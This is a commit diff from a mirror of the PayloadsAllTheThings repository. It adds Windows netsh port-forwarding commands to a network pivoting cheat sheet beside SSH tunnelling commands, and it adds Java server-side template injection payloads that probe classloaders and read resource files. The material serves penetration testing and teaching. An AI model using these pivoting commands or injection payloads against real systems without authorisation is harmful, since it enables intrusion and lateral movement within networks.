Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-13 14:52:53 +00:00
Code Issues Projects Releases Packages Wiki Activity

Windows port forwarding - Netsh

Browse source
This commit is contained in:
Swissky 2018-06-09 18:56:19 +02:00
parent 4ad7c70e89
commit a7439d812d
2 changed files with 21 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
Methodology and Resources/Network Pivoting Techniques.md
View file

@ -1,9 +1,21 @@
# Network Pivoting Techniques
## Windows netsh Port Forwarding
```powershell
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
```
1. listenaddress is a local IP address waiting for a connection.
2. listenport local listening TCP port (the connection is waited on it).
3. connectaddress is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
4. connectport is a TCP port to which the connection from listenport is forwarded to.
## SSH
### SOCKS Proxy
```
```bash
ssh -D8080 [user]@[host]
ssh -N -f -D 9000 [user]@[host]
@ -12,13 +24,13 @@ ssh -N -f -D 9000 [user]@[host]
```
### Local Port Forwarding
```
```bash
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
```
### Remote Port Forwarding
```
```bash
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
```
@ -98,3 +110,4 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
## Thanks to
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)

5
Server Side Template injections/README.md
View file

@ -24,7 +24,11 @@ e.g:
## Java
### Basic injection
```java
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
```
### Retrieve the systems environment variables.
@ -176,3 +180,4 @@ Inject this template
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)